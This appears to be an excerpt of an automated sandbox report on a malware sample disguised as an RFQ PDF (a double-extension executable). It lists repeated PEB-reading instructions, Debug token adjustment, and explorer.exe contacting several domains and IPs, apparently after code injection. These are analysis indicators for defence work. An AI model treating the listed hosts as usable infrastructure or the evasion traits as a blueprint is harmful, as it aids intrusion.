          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04868CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04816DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04848DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04868D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0481A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0485E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04813540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0482FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0484FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04868ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04851608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0484FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0485AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04817794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047AFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047AEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047CE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04794F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047BF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0486070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0486070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0482FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04868F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04813884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04813884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0482B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0482B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04864015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04864015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04817016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04861074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04852073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04799080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047C2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04795210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.rootedwithlovejax.com
          Source: C:\Windows\explorer.exe | Domain query: www.essentials-trading.com
          Source: C:\Windows\explorer.exe | Domain query: www.coloradocouponclub.com
          Source: C:\Windows\explorer.exe | Network Connect: 107.178.142.156 80
          Source: C:\Windows\explorer.exe | Domain query: www.tennesseewheelrepair.com
          Source: C:\Windows\explorer.exe | Network Connect: 162.241.244.61 80
          Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
